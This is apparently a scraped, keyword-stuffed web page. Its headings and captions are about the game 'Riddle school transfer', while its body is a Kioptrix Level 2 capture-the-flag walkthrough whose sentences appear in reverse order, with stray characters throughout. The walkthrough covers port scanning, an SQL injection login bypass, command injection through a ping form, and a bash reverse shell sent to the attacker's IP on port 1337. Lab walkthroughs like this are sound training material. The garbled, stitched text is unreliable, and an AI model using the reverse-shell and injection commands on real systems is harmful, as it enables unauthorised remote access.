- #Riddle school transfer walkthrough step by step code#
- #Riddle school transfer walkthrough step by step series#
Our next step from here would be to carry out some Privilege Escalation to be able to get access to the root account. Perfect! We were able to connect to the victim’s machine, and it seems that we are currently running as the normal user account. This will basically initiate a reverse TCP connection using bash to the IP address of your machine ( 192.168.36.128 in our case), on port 1337. Now, let’s go back to the Ping console on the website and run the following command:Ĭommand: 127.0.0.1 bash -i >& /dev/tcp/192.168.36.128/1337 0>&1 Let’s start by setting up a Netcat listener on port 1337 by typing the following command in your Kali Linux machine terminal. Nice! The script is vulnerable to command injection! Thus, we can go ahead and attempt to invoke a Reverse Shell. Technically the “ ” symbol is a command separator. What this does, is basically tells the system to run ping against our Kali Linux machine, then run the ls command, id command and whoami command. At this point, we can try to see if the php script is vulnerable to Command Injection.īack at the main Ping Command page, let’s go ahead and type: 192.168.36.128 ls id whoami
#Riddle school transfer walkthrough step by step code#
Okay! It seems that the ping command works and that the php code is executing system commands. We can test this Ping Command prompt by trying to ping our Kali Linux Machine ( 192.168.36.128). Perfect! The SQL Injection worked and we are able to access the next page, which seems like a Ping Command prompt! If you want to learn more about SQL Injection, then I suggest you to read this article by Chetan Soni. You can try to bypass it with the following payload: So whenever you found any login page, your first step is to bypass it with SQL Injection (String based). Let’s also try pulling up the port 80/443 site in a browser which shows some kind of Login page.
![riddle school transfer walkthrough step by step riddle school transfer walkthrough step by step](https://i.ytimg.com/vi/Pr-aW2nrlms/maxresdefault.jpg)
On Port 631, CUPS service is running (Common Unix Printing System) whose version is 1.1. A quick Google search showed us that CUPS had multiple vulnerabilities. Port 443/tcp – HTTPS – Apache httpd 2.0.52įrom the initial scanning, it seems that SSH Service is running on Port 22 and Apache service is also running on Port 80 and Port 443 which is of interesting thing for all os us.Įven more, On port 3306, Mysql Service is also running which means there should be some kind of DB connectivity so the chances of SQL Injection are very HIGH.Port 80/tcp – HTTP – Apache httpd 2.0.52.
![riddle school transfer walkthrough step by step riddle school transfer walkthrough step by step](https://m.gjcdn.net/game-screenshot/400/472851-jnch4xvj-v4.jpg)
So your Kioptrix VM Machine IP is 192.168.36.130 and your Kali Linux machine IP is 192.168.36.128. Let’s go ahead and fingerprint all the ports and services with the help of Nmap tool.Īs you can see that, the following ports are in opened state: Note: Make sure that your Kali Linux machine and Kioptrix VM Machine are on same NAT mode.
![riddle school transfer walkthrough step by step riddle school transfer walkthrough step by step](http://chargefasr543.weebly.com/uploads/1/2/5/5/125581109/731349363.jpg)
So your first part is to get the IP address of this machine which you can easily get it via netdiscover tool by typing the following command in your terminal.Ĭommand: netdiscover -i eth0 -r 192.168.36.0/24 Start your Kioptrix1.1 Level 2 VM Machine and you’ll get the similar below image which prompt some kind of login and your task is to get into root shell and access all the files. The kioptrix VMs are intended for anyone who wants to start getting into pentesting or want to pursue the OSCP exam.
#Riddle school transfer walkthrough step by step series#
Kioptrix: Level 1.1 (Level 2) is the second VM of the Kioptrix series which can be found here.